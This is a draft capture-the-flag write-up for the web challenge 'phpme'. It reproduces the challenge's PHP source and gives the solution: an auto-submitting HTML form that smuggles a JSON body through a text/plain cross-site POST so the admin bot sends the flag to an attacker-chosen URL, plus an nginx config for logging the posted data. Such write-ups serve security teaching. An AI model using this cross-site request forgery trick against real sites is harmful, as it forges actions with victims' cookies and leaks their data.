95 lines
2.8 KiB
Markdown
95 lines
2.8 KiB
Markdown
# DRAFT : NOT FINISHED
|
|
|
|
# phpme
|
|
|
|
by [5225225](https://www.5snb.club) and haskal
|
|
|
|
web / 469 pts / 64 solves
|
|
|
|
> "This is what normal PHP CTF challenges look like, right?" - A web dev who barely knows PHP
|
|
|
|
Going to the URL given shows us this source code
|
|
|
|
```php
|
|
<?php
|
|
include "secret.php";
|
|
|
|
// https://stackoverflow.com/a/6041773
|
|
function isJSON($string) {
|
|
json_decode($string);
|
|
return json_last_error() === JSON_ERROR_NONE;
|
|
}
|
|
|
|
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
|
|
if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
|
|
// https://stackoverflow.com/a/7084677
|
|
$body = file_get_contents('php://input');
|
|
if(isJSON($body) && is_object(json_decode($body))) {
|
|
$json = json_decode($body, true);
|
|
if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
|
|
echo "<script>\n";
|
|
echo " let url = '" . htmlspecialchars($json["url"]) . "';\n";
|
|
echo " navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\n";
|
|
echo "</script>\n";
|
|
}
|
|
else {
|
|
echo "nope :)";
|
|
}
|
|
}
|
|
else {
|
|
echo "not json bro";
|
|
}
|
|
}
|
|
else {
|
|
echo "ur not admin!!!";
|
|
}
|
|
}
|
|
else {
|
|
show_source(__FILE__);
|
|
}
|
|
?>
|
|
```
|
|
|
|
The challenge is to get the admin bot to visit a URL and make a POST request
|
|
without user interaction, and then receive the flag back as a POST to the url
|
|
given.
|
|
|
|
The easiest way to do this is with a form. One issue is that form submission is
|
|
submitting key/value pairs, but we need to submit valid JSON. [System Overlord
|
|
- Posting JSON with an HTML
|
|
Form](https://systemoverlord.com/2016/08/24/posting-json-with-an-html-form.html)
|
|
was useful here.
|
|
|
|
The final solution was
|
|
|
|
```html
|
|
<body onload='document.forms[0].submit()'>
|
|
<form action='https://phpme.be.ax/' method='POST' enctype='text/plain'>
|
|
<input name='{"yep":"yep yep yep", "url":"<URL>", "trash": "' value='"}'>
|
|
</form>
|
|
</body>
|
|
```
|
|
|
|
with `<URL>` replaced with some URL that can receive POST requests.
|
|
|
|
I (522) didn't have an easy setup to receive the values of post requests, so
|
|
I got haskal to set up nginx to log the values of POST data, then look through
|
|
their logs. There's most definitely cleaner ways to do this, but this worked!
|
|
|
|
For future reference, the nginx directive to log POSTed data is
|
|
|
|
```nginx
|
|
log_format postdata $request_body;
|
|
|
|
server {
|
|
location /flagzone {
|
|
access_log /var/log/nginx/flags.log postdata;
|
|
echo_read_request_body;
|
|
# ...
|
|
}
|
|
# ...
|
|
}
|
|
```
|
|
|
|
Once you get the data back, you can simply submit the flag and you're done!
|